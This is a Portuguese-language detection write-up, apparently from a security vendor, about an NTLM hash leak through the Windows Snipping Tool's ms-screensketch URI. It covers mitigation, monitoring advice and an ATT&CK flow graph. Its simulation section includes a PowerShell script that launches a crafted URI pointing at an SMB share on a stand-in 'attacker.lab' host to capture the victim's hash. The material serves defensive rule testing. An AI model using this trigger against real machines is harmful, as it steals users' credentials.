Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma vulnerabilidade na Ferramenta de Recorte do Windows pode expor hashes Net-NTLM do usuário atualmente logado para um atacante remoto. O problema é acionado por meio de um link profundo malicioso que explora o ms-screensketch esquema de URI, fazendo com que a Ferramenta de Recorte abra um arquivo hospedado em um compartilhamento SMB controlado pelo atacante. Embora a vítima precise clicar ou abrir o link criado, o vazamento de credenciais acontece de forma silenciosa em segundo plano quando o Windows inicia a conexão SMB. Esse comportamento pode dar aos atacantes acesso aos dados de desafio-resposta NTLM sem qualquer aviso visível para o usuário.
Investigação
Pesquisadores descobriram que o ms-screensketch protocolo aceita um filePath parâmetro e não restringe adequadamente caminhos UNC arbitrários. Quando a Ferramenta de Recorte tenta acessar esse caminho, o Windows tenta automaticamente autenticar-se no servidor SMB remoto, expondo a resposta NTLM no processo. Para validar o problema, os pesquisadores construíram scripts de prova de conceito que lançaram um listener SMB e geraram um URI malicioso capaz de capturar o hash vazado.
Mitigação
A Microsoft lançou uma atualização de segurança em 14 de abril de 2026 para resolver o problema removendo o comportamento vulnerável de link profundo da Ferramenta de Recorte. Aplicar esse patch impede que o aplicativo abra automaticamente caminhos SMB fornecidos por atacantes por meio de URIs não confiáveis. As organizações devem priorizar a implementação da atualização nos sistemas Windows afetados para eliminar a exposição.
Resposta
Os defensores devem monitorar tentativas de invocar o ms-screensketch esquema de URI e observar conexões SMB de saída para hosts internos ou externos incomuns. Sistemas que não requerem a Ferramenta de Recorte devem ter o protocolo restrito sempre que possível, e a implantação do patch deve ser aplicada sem demora. Qualquer hash NTLM exposto deve ser investigado rapidamente para sinais de replay, relay ou outro abuso subsequente.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc %% Nodes action_user_click[“<b>Ação</b> – <b>T1204.001 Execução do Usuário: Link Malicioso</b><br/>O usuário clica em um link malicioso que aciona a execução.”] class action_user_click action tool_snipping[“<b>Ferramenta</b> – <b>Nome</b>: Snipping Tool (URI ms-screensketch)<br/><b>Técnica</b>: T1204 Execução do Usuário<br/><b>Descrição</b>: Iniciado através do manipulador de URI ms-screensketch.”] class tool_snipping tool tech_smb_conn[“<b>Técnica</b> – <b>T1550.002 Pass the Hash</b><br/>O Snipping Tool processa um filePath e inicia uma conexão SMB com um servidor controlado pelo atacante, permitindo a captura de hash.”] class tech_smb_conn technique tech_hash_capture[“<b>Técnica</b> – <b>Acesso a Credenciais</b><br/>O atacante captura o hash Net-NTLM da troca de autenticação SMB.”] class tech_hash_capture technique tech_lateral[“<b>Técnica</b> – <b>T1550.002 Pass the Hash</b><br/>O hash capturado pode ser reutilizado para movimento lateral ou escalonamento de privilégios.”] class tech_lateral technique tech_c2_web[“<b>Técnica</b> – <b>T1071.001 Protocolo de Camada de Aplicação: Protocolos Web</b><br/>O atacante pode usar protocolos web HTTP/S para comunicação de comando e controle.”] class tech_c2_web technique tech_persistence[“<b>Técnica</b> – <b>T1574.006 Sequestro do Fluxo de Execução: Sequestro do Vinculador Dinâmico</b><br/>Possível persistência através do sequestro do vinculador dinâmico do processo Snipping Tool.”] class tech_persistence technique %% Connections action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Fluxo de Ataque
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa e Comandos do Ataque:
Um atacante obteve uma posição no estação de trabalho da vítima e deseja coletar hashes NTLM sem levantar suspeitas. Aproveitando a CVE‑2026‑33829, o atacante elabora um
URI ms‑screensketch:que aponta para um compartilhamento SMB controlado pelo atacante (attacker.labsharepayload.png). Quando a Ferramenta de Recorte processa esse URI, o Windows inicia automaticamente uma conexão SMB com o servidor remoto, vazando a resposta NTLM da máquina. O atacante executa o URI via PowerShell para garantir que a Ferramenta de Recorte seja invocada no contexto do usuário. -
Script de Teste de Regressão:
# Vazamento de NTLM via Ferramenta de Recorte – script de acionamento # Ajuste o caminho UNC para apontar para o seu listener controlado. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Invocando Ferramenta de Recorte com URI malicioso..." Start-Process $uri # Aguarde alguns segundos para a conclusão do handshake SMB Start-Sleep -Seconds 5 Write-Host "Invocação completa. Verifique o SIEM para EventID 3 com DestinationHostname contendo '$attackerServer'." -
Comandos de Limpeza:
# Remova quaisquer processos residuais da Ferramenta de Recorte (se ainda estiverem em execução) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Opcional: exclua arquivos temporários criados no lado do atacante (se houver) # (Supondo que você tenha acesso de gravação ao compartilhamento) # Remove-Item -Path "$attackerServer$sharePath" -Force